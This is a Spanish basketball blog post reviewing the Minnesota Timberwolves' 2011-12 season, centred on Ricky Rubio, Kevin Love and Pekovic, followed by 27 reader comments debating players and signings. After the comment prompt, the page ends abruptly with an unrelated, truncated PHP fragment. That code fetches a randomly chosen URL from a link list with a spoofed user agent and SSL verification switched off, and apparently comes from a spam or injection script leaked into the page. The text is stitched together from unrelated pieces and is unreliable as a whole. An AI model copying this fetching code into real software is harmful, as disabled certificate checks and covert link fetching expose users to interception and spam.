Minnesota Timberwolves: Bien

01 de August de 2012 por HisRoyalAirness

El análisis de principio de curso de los Wolves dibujaba una temporada que se presentaba ilusionante. La pregunta “¿un paso adelante?” podría tener un sí rotundo como respuesta. Eso pensábamos todos.

Remontémonos un año a las gélidas inmediaciones del Target Center. El estadio, semivacío, presentaba un aspecto bastante desolador. Multitud de derrotas, una suerte de intento de “triangle offence” inoperante y unos miembros del equipo desganados y sin rumbo fijo. El único rayo de esperanza era un joven de UCLA con una gran presencia bajo aros pese a no ser un atleta al uso y una gran voluntad para pulir diferentes aspectos de su juego.

Tras el lockout, el despido más que merecido de Kurt Rambis y la acertadísima contratación del gran Rick Adelman, sin apenas tiempo para adaptarse al nuevo estilo de juego debido a un training camp casi testimonial, la navidad llegaba y, con ella, la regular season.

La era Rick Adelman comenzaba con este quinteto: Luke Ridnour – Wesley Johnson – Michael Beasley – Kevin Love – Darko Milicic. A priori no se atisbaba nada excesivamente esperanzador. Las cosas no iban del todo mal, sobre todo por la sensación de superioridad que desprendía Love, con un acierto y rango de tiro asombroso y una presencia espectacular, presentando además un nuevo aspecto más esbelto y atlético con esperanza de ganar velocidad. Parece que funcionaba de maravilla porque, a pesar de no perder ni pizca de presencia reboteadora, manejaba a su antojo el catch and shoot desde cualquier área y con un acierto que rozaba el 50 por ciento.

Resulta que al final del primer cuarto, un chico moreno, largirucho y con aspecto desgarbado saltó a la pista del Target Center y algo se alborotó en la fría Minny. Después de tantas críticas, tanto hype y tanta desconfianza, para tristeza de unos y alegría de muchos otros, algo cambió en el equipo de los Wolves. Pero cambió de verdad. Su primer gesto fue una indicación a un compañero. Nada más salir y colocarse el pantalón. ¡Un rookie dando órdenes! Impensable. La primera vez que subió el balón lo hizo mandando, ordenando y marcando jugadas. A los  pocos minutos cogió a todos sus compañeros e hizo un corro con ellos dando indicaciones. Las cosas claras: en la pista mando yo.

Su tercera asistencia fue un pase picado precioso entre 2 rivales, los comentaristas americanos pegaban el primer grito. La cuarta, una maravilla. Antes de que Ricky Rubio saltase a la pista los Timberwolves perdían de casi 10. Los puso por delante. Y así hasta 2 veces en el partido, siempre con él en pista. Love sonreía satisfecho. En NBA TV decían: “He got game, pass. He is fluid. Incredible court vision!!”. Revolucionó el partido y la grada. Lideró.

El rival eran los a la postre finalistas Oklahoma City Thunder y aunque al final el chaval de Masnou no pudo llevarse la victoria por bien poco, los aficionados de los Wolves se fueron para casa con una sonrisa en los labios gracias a las sensaciones y emociones vividas después de tanto tiempo hartos de mediocridad.

El siguiente partido, casualidades del destino, fue contra los otros finalistas, los Miami Heat. Al inicio del encuentro, los de Adelman perdían por 12 puntos. Volvió a salir Ricky y se pusieron por delante de nuevo.

Como parece que esto está siendo una loa gratuíta y forofa, para que la gente que no siguiese mucho sus inicios se haga una idea de su repercusión hay un hecho que destaca lo que suponía en pista. El catalán, de 21 añitos y jugando su 2º partido en la NBA, preparó a los Heat tal berenjenal de pases y desajustes defensivos que, con el partido igualado, Spoelstra no tuvo más remedio que poner a Lebron James a defenderle. Lebron, esa especie de ser mitológico de mármol que se empareja con Kobe, Carmelo o Durant. Esa bestia capaz de cruzar la pista en 3 segundos y comerse el aro como quien respira. Pues tuvieron que ponerle delante de un rookie ya que el partido, empatado en el último cuarto, se les estaba yendo de las manos por culpa de ese blanquito escurridizo. Al margen del resultado final, Ricky Rubio terminó su segundo partido NBA con un doble-doble de 12 puntos y 12 asistencias, a los que añadió 6 rebotes.

Durante los primeros meses de competición los Wolves eran la sensación del campeonato: siempre en los highlights, victorias ante equipos superiores (como ante Mavs, en Dallas, el día de la entrega del anillo) y sensaciones más que positivas. Nikola Pekovic, un desconocido por aquellos lares, empezó a sumar minutos dada la sabida inoperancia de nuestro querido Darko. Si hubiese jugado desde el inicio y no se hubiese lesionado no habría sido raro verle pelear seriamente por el all-star. Movimientos en el poste bajo de 5 puro, un acierto en tiros libres inusitado para un pívot y un empleo de su tamaño perfecto. Todo ello sumado al absoluto dominio de Love, una consistencia atípica de Beasley, el habitual acierto en el tiro de Ridnour y las ganas y el buen hacer del otro rookie, Derrick Williams, que pese a contar con pocos minutos dio muestras suficientes de su físico y su buena mano. JJ Barea, aunque lastrado por contínuos problemas físicos, aportaba su chispa y anotación cuando se le requería.

Allá por enero-febrero, con Ricky (rookie del mes) al mando de la intendencia y un quinteto formado por el susodicho más Ridnour, Beasley, Love y Pekovic, los de Minnesota lucían un balance positivo. Kevin Love estaba sobre los 30-15 de media, y “Pek” sobre los 15-10. El equipo estaba octavo en el Oeste, en puestos de postemporada. Tolliver y Randolph anotaban con bastante fluidez cuando salían a pista y parecía que Rubio podía hacer que cualquier persona del equipo metiese triples como churros.

Y entonces ocurrió: en un choque fortuito defendiendo a Kobe Bryant el ligamento cruzado anterior del 9 de los Wolves se rompió. Dicho ligamento, para explicarlo un poco facilote, es el que impide que la tibia se desplace hacia delante con respecto al fémur. El temor a esta lesión por parte de los deportistas es que los injertos que se emplean para repararlo, al ser una zona con muy poco aporte sanguíneo, puedan volver a romperse. Es por eso por lo que no cicatriza y hay que ponerle un elemento externo, la llamada plastia.

A partir de aquí se produjo el desastre. A la baja de Ricky se fueron uniendo la de Pekovic, Love y otros tantos. Los Timberwolves no llegaron ni a ganar 10 partidos más y se alejaron dramáticamente de los puestos de playoffs. Fue frustrante ver la inoperancia del equipo pero es que a Adelman se le rompieron los esquemas. La actuación del entrenador fue espectacular durante toda la temporada, sacando rendimiento de debajo de las piedras cuando las bajas asolaban el equipo y firmando la que, para mí, es la jugada de pizarra del año: Stapples Center, 98-98 en el electrónico y 1’5 segundos para el final del tiempo reglamentario. Posesión para Minny, saque de banda en campo rival. Saca Ridnour, Derrick Williams queda libre en el lado contrario de la pista y se acerca a recibir. Mientras, el resto de sus compañeros hacen un triple bloqueo en la línea de tiro libre. Cuando todos esperan el balón para Williams (y el partido a la prórroga, por supuesto) Kevin Love sale de la línea de bloqueos, sus compañeros encierran, literalmente, a su defensor, engancha el balón por detrás de la línea de tres y obra el milagro. Ajedrez puro y duro. Jugada de fútbol americano, de entrenador curtido en mil batallas.

Hasta la mitad de temporada los “lobos” eran el equipo revelación. El deporte de élite tiene estas cosas y las lesiones forman parte de él. Son un mal necesario como lo son los tatuajes de Mike Miller o el pelo de Mike Bibby. Tenemos que asumirlos y seguir hacia delante.

Al margen de todo esto se han visto varias cosas más que positivas:

1.- Hay un entrenador de primer nivel y con las ideas claras al que no le tiembla el pulso a la hora de sentar a quien se lo merece. Por fin hay un estilo de juego y roles definidos. Love es la estrella y el anotador referencia, Pekovic es el pívot puro al que también se le hacen aclarados y jugadas propias y Ricky organiza el juego. Sin abusar del pick&rollpick&pop pero sin olvidarlos, los dos interiores se ven bien nutridos de balones para hacer daño en la pintura.

2.- Hay 3 jugadores jóvenes, con personalidad propia alrededor de los cuales constituir un proyecto serio y con aspiraciones.

3.- Los aficionados vuelven a disfrutar de su equipo. El Target ha presentado varios llenos completos y el ambiente ha sido, por momentos, inmejorable.

Lo mejor: El escandaloso nivel de Kevin Love. El surgimiento de Pekovic como gran pívot, ofensivo y defensivo. Ricard Rubio y su magia. Adelman, su cuello vuelto con americana y su sello.

Lo peor: las lesiones. El “coitus interruptus” que ha supuesto la no progresión de Wes Johnson. Las manazas de Darko. La segunda mitad de la temporada.

Jugando a GM

– Parece que las vacaciones, y las palabras de Love, han hecho que David Kahn empiece a moverse y lo haga con buen rumbo. Necesitaban un escolta como el comer y, a falta de confirmación oficial aunque ya exista la extraoficial, la incorporación de Brandon Roy, aún al 50% de su capacidad, es una noticia excelente. No pudo ser lo de Allen ni lo de OJ pero ya se sabe que nadie quiere ir al norte a pasar frío.

– El que sí está confirmado es el fichaje de AK-47, Andrei Kirilenko para los amigos, a un precio, en mi opinión, algo desorbitado: 2 años a razón de 10 “kilos” cada temporada. De todos modos hay pocos tipos de su tamaño con su capacidad defensiva y su manita. Aún así, lo que se iba a pagar por Batum me parecía otro atraco y por lo menos AK es más maduro y con más experiencia. Ya tenemos cubierto el puesto de 2 y el de 3.

– Proveniente también de Europa, concretamente del CSKA, han incorporado a Alexey Shved, un base-escolta de 23 años, buen anotador y bastante atlético, por lo que parece que alternará las posiciones de 1 y de 2 hasta que se recupere Ricky.

– Llega también al vestuario Dante Cunningham, traspasado por Wayne Ellington, un small forward que puede aportar bastante en la rotación de Adelman. No creo que esté la cosa como para deshacerse de un escolta cumplidor de buen físico como Ellington, pero ellos sabrán.

– Para completar el banquillo, y dada la marcha de Darko mediante la cláusula de amnistía, llega el trotamundos Greg Stiemsa para darle sus minutos de descanso a Pek.

– Bajas destacables son las de Martell Webster, Anthony Randolph y Michael Beasley, todos hombres con gran calidad pero más díscolos e irregulares de lo que cabe soportar.

– También parece que Wesley Johnson tiene los días contados, otra decepción del draft de los de Minneapolis (elegido antes que DeMarcus Cousins) a cambio de calderilla (segundas rondas).

Comenta

27 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Uff duele pensar la pareja que hubieran sido Cousins y Love +Pekovic en plan rotación de tres interiores. La verdad es que Johnson destacaba porque era mayor que los demás, y ya se pensaba que mucho no iba a progresar. Qué elección…

      Citar

  2. melo15 dice:
    #2

    No creo que Pekovic hubiera tenido muchos minitos con Cousins por ahi, aunque tampoco veo muy complementarios a Cousins y a Love, ambos tienen muchas clase pero poco fisico y defensa.

    Por fin se deshacen de Beasley que ya no pintaba nada en ese equipo y asi le deja espacio a. Derrick Williams que supongo que saldra de 6 hombre.

    Ayer vi al Sved este y me dio la sensacion de base puro, y con Ricky en Minny nose si tendra mucho espacio.
    Gran analisis por cierto muy completo.

    PD: Pues a mi Wesley Johnson me caia bien, era un tio con atletico, buen defensor y con buena mano, pero se ha quedado en especialista defensivo y en ataque parado en una esquina.

      Citar

  3. Heineken dice:
    #3

    melo15:
    No creo que Pekovic hubiera tenido muchos minitos con Cousins por ahi, aunque tampoco veo muy complementarios a Cousins y a Love, ambos tienen muchas clase pero poco fisico y defensa.

    Por fin se deshacen de Beasley que ya no pintaba nada en ese equipo y asi le deja espacio a. Derrick Williams que supongo que saldra de 6 hombre.

    Ayer vi al Sved este y me dio la sensacion de base puro, y con Ricky en Minny nose si tendra mucho espacio.
    Gran analisis por ciertomuy completo.

    PD: Pues a mi Wesley Johnson me caia bien, era un tio con atletico,buen defensor y con buena mano, pero se ha quedado en especialista defensivo y en ataque parado en una esquina.

    Coincido en todo lo que has dicho, a Shved lo llevo viendo tan solo estas Olimpiadas y me parece más un 1 que un 2, pero tiene buen tiro, así que igual Ridnour pasa a ser escolta tirador (como lo fue durante la mayoría de minutos que compartía pista con Ricky) y Shved se reparte los minutos con Ricky, además de que al tener mejor tiro que el, si juegan juntos, Shved pasaría a ser el 2. Me parece un fantástico jugador.

    De W-Johnson solo añadir que al final si, era eso, defender y en ataque irse a la esquina, pero es que no metía ni un triple desde la esquina y tiraba 4-5 por partido absolutamente solo. Me desesperaba verlo jaja.

    Yo creo que ya solo con Kirilenko dan un salto de calidad enorme, ¿lo estáis viendo estas Olimpiadas? Además que no tendrá que tirar del carro en anotación, primero va Love y luego por delante podrían ir incluso Roy y Pekovic, Kirilenko mientras te aporta en todo lo demás y si hace falta anotar, anota también.

    Ricky-Roy-Kirilenko-Love-Pekovic
    Shved-Ridnour-Derrick Williams-Cummingham-Stiestma

    (A JJ Barea no lo trago xD)

    Me parece un equipo para luchar por playoffs, dependiendo el entrar o no de como regresen de sus lesiones Ricky y Roy y de que no sufran más este año. Y no es ninguna locura esto, porque el año pasado, con todos sanos o ganaban o perdían pero nunca de más de 5-6 puntos y por atascos en los minutos finales debido a que defendían más fuerte a Love y no salía ningún anotador en esos momentos. Ahora tienen más jugadores capaces de asumir tiros finales.

    Y finalizando mi tocho de comentario… yo habría renovado a Randolph!!

      Citar

  4. HisRoyalAirness dice:
    #4

    No te falta razón en lo de Randolph, para mí tiene una calidad tremenda pero es muy disperso y dicen que muestra muy poco interés.
    Lo malo que veo yo a los movimientos es que han incorporado anotación pero se han deshecho de mucho músculo en el perímetro: Webster, Ellington y Johnson. No sé si les pasará factura.

    Respecto a lo de Shved, falta por ver como va a adaptarse pero una cosa es segura, para Adelman Ricky es la piedra angular de su sistema de juego t el base titular indiscutible. Creo que el ruso va a ser más escolta junto a Ridnour y Roy. Es más, creo que para dar descanso a Ricky antes jugarán de 1 Luke o el propio Roy.
    No me extrañaría tampoco que intentaran traspasar a Barea

      Citar

  5. HisRoyalAirness dice:
    #5

    La duda que tengo yo es cómo va a cuajar Roy en este equipo. Si vuelve bien fisicamente no lo vas a tener de tirador y está claro que el anotador ha de ser Love y el que maneja Rubio.
    Va a ser complicado asignar roles

      Citar

  6. melo15 dice:
    #6

    Tambien coincido en lo de Randolph, cuando Love no ha jugado ha rendido muy bien pero estaba claro que en Minnestota no tenia sitio (dudo que lo tenga en Denver) ya que la posicion de 4 y 3 estaban cubridas. Una lastima porque al chaval le sobrava potencial pero su incapacidad para sumar kilos y su mal tiro de media distancia le han dejado anclado en dos posiciones.
    Roy no va a volver igual que hace 2 temporadas, su rodilla no se lo va a permitir pero tiene calidad de sobra y creo que va a tener un rol importante.

      Citar

  7. Vader dice:
    #7

    Os olvidais de Budinger que lo pidio Adelman de su epoca en Rockets.

    Gran análisis!!! Ojala Rubio vuelva al 100%

      Citar

  8. Esteban dice:
    #8

    muy buen analisis, repito, creo que la exaltacion por ricky es algo exagerada, ha superado todas las expectativas, sobretodo las mias, pero todavia hay quie ver si puede convertirse en un jason kidd, de eso dependera si los wolves seran un equipo de primera o segunda ronda, o podrian aspirar a campeon

    love es un mega estrella, a nivel MVP, nada q envidiarle a nadie de la liga, pekovic, un centro del nivel de cualquiera, y kirilenko y roy (si esta bien) no desentonan, de lo q haga ricky dependera el techo de este equipo

      Citar

  9. HisRoyalAirness dice:
    #9

    Esteban, me parece que no has visto muchos partidos de Minnessota este año (tampoco te faltaban razones).
    Hablo del equipo en general, no sólo de Ricky. A lo que menos aspira éste es a ser un Jason Kidd, se asemeja mucho más a un Nash o un Rondo, todos con sus diferencias pero una similitud: hacen funcionar al equipo a su alrededor.
    Y si tienes dudas con Pekovic ponte el partido ante los Lakers en el Target, que lo hay en youtube. Tremendo.

      Citar

  10. nba dice:
    #10

    Bueno, gran analisis Royal, sin duda estos Wolves han pasado de que nadie queria ver un partido de ellos, a que tenga que haber una categoria en los high-lights de la jornada para los Wolves.
    A estos Wolves solo les hace falta salud, ya que creo que Adelman con tiempo hara el resto.
    Roy a dia de hoy sigue siendo una incognita a nivel fisico, y que no lo duden este es el equipo de Love-Ricky, por lo que se tendra que acostumbrar a su rol, o puerta.
    De AK47 y Shved , parecen piezas validas y necesarias, Shved a mi me parece un Llull mejorado.
    Si alguien esta dispuesto a llevarse a Barea, no estaria de mas

      Citar

  11. Esteban dice:
    #11

    HisRoyalAirness:
    Esteban, me parece que no has visto muchos partidos de Minnessota este año (tampoco te faltaban razones).
    Hablo del equipo en general, no sólo de Ricky. A lo que menos aspira éste es a ser un Jason Kidd, se asemeja mucho más a un Nash o un Rondo, todos con sus diferencias pero una similitud: hacen funcionar al equipo a su alrededor.
    Y si tienes dudas con Pekovic ponte el partido ante los Lakers en el Target, que lo hay en youtube. Tremendo.

    bueno si tu lo dices, no hay duda que entrara al salon de la fama entonces

      Citar

  12. Nacho dice:
    #12

    Shevd es un 2 que puede jugar de 1. Y lo que le he visto en la Euroliga es muy bueno. Soltarán a Barea seguramente.
    Yo tengo dudas con Love. No sé si asumirá bien tener tanta gente resolutiva a su lado.

      Citar

  13. Esteban dice:
    #13

    Lo q digo de ricky, es q si bien fue rookie en la nba, no es un chaval de 18 q viene de jugar en la escuela secundaria y q es su primer experiencia profesional, juega al basquet profesional desde hace 7 años, juego euroligas, mundiales, finales de juegos olimpicos

    Esto puede no decir nada, pero a mi se me hace q su techo no esta tan lejos de lo mostrado este año, mejorara si, pero no se cuanto mas podra dar

      Citar

  14. HisRoyalAirness dice:
    #14

    Yo no he dicho nada de Hall of Fame pero bueno…
    Y a mí con su nivel ya me ha demostrado que puede llevar las riendas de un equipo

      Citar

  15. melo15 dice:
    #15

    Creo que Ricky no se asemeja mucho a Nash, ambos son grandes directores de juego y muy buena vision y creatividad pero Nash es una maquina tirando y Ricky en mucho mejor defendiendo. Creo que se parece mas a Kidd ya que Ricky tambien rebotea bien. Creo que Ricky sera all-star y de los exitos futurtos dependera su ingreso al HoF.
    Sobre Roy si es verdad que puede volver al 100% yo le daria mucha importancia pero sin dejarle que abusara de las posesiones como en Portland. Todos sabemos que Roy a su nivel es all-star y casi mejor jugador que Love, asi que si vuelve al nivel de hace dos años yo lo pondria como segunda opcion en ataque.

      Citar

  16. melo15 dice:
    #16

    Hombre Royal, ni Nash ni Rondo han sido superiores a Kidd, es mas creo que este ultimo ha sido un pelin superior a Nash. Me baso en los exitos colectivos, Nash tiene 2 MVP pero Kidd 3 finales y 1 anillo.

      Citar

  17. Esteban dice:
    #17

    la discusion sobre nash y kidd merece un post aparte, para mi nash ha sido mucho mejor, las dos finales de los nets de aquellos años se debieron pura y exclusivamente al pesimo nivel de la conferencia este, esto se ve en las palizas que recibieron cuando jugaron las finales de NBA, nash ah llegado a final de conferencia con un camino muchisimo mas duro que los nets a la final de nba

    sobre kidd, nombre a el justamente por que lo considero menos que nash, ya decir que ricky llegara al nivel del canadiense es basarse en fantasias, no digo que sea imposible, pero nash ha sido dos veces MVP de la temporada regular, y all-star como 10 años seguidos, ademas de ser un jugador franquicia de un equipo contendiente como los suns,
    decir que ricky llegara a tanto es exagerado, de hecho, son muy muy pocos los jugadores que tienen dos MVP de la regular, si lo lograra ricky estariamos ante uno de los mejores jugadores extranjeros de lahistoria de la liga, me parece aventurarse demasiado

    un nivel como el de kidd es mas cercano, un base director, gran pasador y exelente defensor, que mas se puede pedir??

    sobre roy, habra que ver, puede volver siendo una bestia como un cachorro, hemos visto muchas historias y todas con finales diferentes, desde grant hill y su resurreccion sindo a los 40 años una pieza valida en la nba desp de estar años y años en 0, y mcgrady, que luego de sus lesiones, solo regala una actuacion destacada cada 15 o 20 juegos y ya no puede defender a nadie

    lo de roy es una moneda al aire, puede salir cualquier cosa, por eso digo que me parece malo dos años de contrato y 5 millones, que vuelva en mala forma y juega apenas aceptable, ya seria bueno, por que lo mas logico seria que vuelva a lesionarse y perderse un año o mas de competicion

      Citar

  18. melo15 dice:
    #18

    Muy de acuerdo contigo Esteban pero creo que subestimas a Kidd, sera Hall of Famer y uno de los 15 mejores bases de la historia, creo que me he pasado poniendolo mejor que Nash pero sin duda Kidd en jugadorazo.

      Citar

  19. HisRoyalAirness dice:
    #19

    Vamos a ver, me refería a Nash o Rondo por su virtud principal y la de ellos: la visión de juego y la excelencia en el pase. Por supuesto que Nash es mil veces mejor tirador que los 2 y Rondo y Ricky defienden mejor. Pero vamos, tienen cosas en común y a eso voy.
    Respecto a Kidd vS Nash? Hombre, al Este llegaba a las Finales el equipo de mi colegio yo creo. Creo que si Nash estuviese en el Este habría llegado 9 veces.
    2 MVPs un base… Sabéis cuál fue el último no? Pues eso.

      Citar

  20. Esteban dice:
    #20

    HisRoyalAirness:
    Vamos a ver, me refería a Nash o Rondo por su virtud principal y la de ellos: la visión de juego y la excelencia en el pase. Por supuesto que Nash es mil veces mejor tirador que los 2 y Rondo y Ricky defienden mejor. Pero vamos, tienen cosas en común y a eso voy.

    his yo no lo decia en su virtud principal respecto de kidd, sino integral, creo que ricky tiene potencial para ser un base de elite como el, de ese nivel, un all-star permanente, aunque por su falta de tiro y anotacion, incapaz de ser un lider franquicia que defina juegos, (ahi se parece a rondo), aunque con love eso no seria un problema

    creo q ricky tiene el potencial para ser un base de enorme nivel, pero debe mejorar mucho ofensivamente parar ser un jugador franquicia

      Citar

  21. rumbero dice:
    #21

    Esteban: his yo no lo decia en su virtud principal respecto de kidd, sino integral, creo que ricky tiene potencial para ser un base de elite como el, de ese nivel, un all-star permanente, aunque por su falta de tiro y anotacion, incapaz de ser un lider franquicia que defina juegos, (ahi se parece a rondo), aunque con love eso no seria un problemacreo q ricky tiene el potencial para ser un base de enorme nivel, pero debe mejorar mucho ofensivamente parar ser un jugador franquicia

    Es que seguramente no llegue a ser ese jugador que te mete 30 puntos o se juega los tiros decisivos para ganar un partido. De esos ya hay unos cuantos y muy buenos, pero de esos que cuando estan en pista ves que toman el control del equipo, que lo mueven a su aire, que levantan al público, que el tio que llevaba un 0/5 las empieza a enchufar porque el equipo se viene arriba…de esos hay menos, y a mi Ricky también me ha transmitido esta sensanción en algunos partidos con los Wolves, como me pasa con Rondo, y como pasaba con Nash en esos Suns que molaban tanto.
    Muy buen análisis!

      Citar

  22. Alfredo dice:
    #22

    melo15: Tambien coincido en lo de Randolph, cuando Love no ha jugado ha rendido muy bien pero estaba claro que en Minnestota no tenia sitio (dudo que lo tenga en Denver) ya que la posicion de 4 y 3 estaban cubridas. Una lastima porque al chaval le sobrava potencial pero su incapacidad para sumar kilos y su mal tiro de media distancia le han dejado anclado en dos posiciones.Roy no va a volver igual que hace 2 temporadas, su rodilla no se lo va a permitir pero tiene calidad de sobra y creo que va a tener un rol importante.

    MELOOOOOOOOOOOOOOOOOOOOO!!!! Por Dios!!! “CUBRIDAS” no, CUBIERTAS!!! Yo tolero muchas cosas pero casi tengo un desprendimiento de retina al verlo. Gran resumen, como gran futuro para los Wolves, fichando inteligentemente para un entrenador inteligente, un director de juego inteligente y una superestrella inteligente

      Citar

  23. nba dice:
    #23

    Dejemos que Ricky haga un par de temporadas completas en la NBA y entonces estaremos en disposicion de emitir un juicio mas acertado, no nos olvidemos que su primera temporada en el Barca fue de fabula, pero en la segunda estaba para echarlo a los leones, las cosas paso a paso, primero que vuelva en plenas condiciones fisicas.
    Sobre el debate de a que base se parece mas o es mejor, cuestion de gustos, pero yo me conformaba con que llegase a tener un palmares similar al de Tony Parker, puestos a pedir, porque no pedir la luna.

      Citar

  24. Pop dice:
    #24

    Qué completo es Kevin Love, le ha dado hasta para ganar los 200 espalda en los JJOO:

    http://www.london2012.com/swimming/event/men-200m-backstroke/index.html

      Citar

  25. HisRoyalAirness dice:
    #25

    Yo creo que si el equipo funciona algo mejor y se meten en playoffs Love va a ser MVP. Si este año se hubiesen metido creo que ya lo habría merecido.
    Cuando el equipo estaba fresco y sin muchas lesiones estuvo meses promediando 30 puntos, 15-16 rebotes y con un porcentaje tremendo.
    Para mí es uno de los 5 mejores jugadores ahora mismo

      Citar

  26. melo15 dice:
    #26

    Bueno, darle el MVP me pareceria excesivo, sobretofo porque puede que los Thunder queden primeros y el MVp entonces se lo tendrian que dar a Durant o si los Knicks quedan primeros, porque si Melo en 14 minutos mete 37 en 35 te enchufa 60…
    Vayas Olimpiadas de Carmelo, si USA gana y el sigue asi, le tendrian que dar el MVP.

      Citar

  27. nba dice:
    #27

    No adelantemos acontecimientos, que las plantillas no estan cerradas , aunque parece que si todo transcurre con normalidad en el Oeste , los dos Kevin puede que sean candidatos al MVP, veremos que tiene que decir Tony Parker respecto a esto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>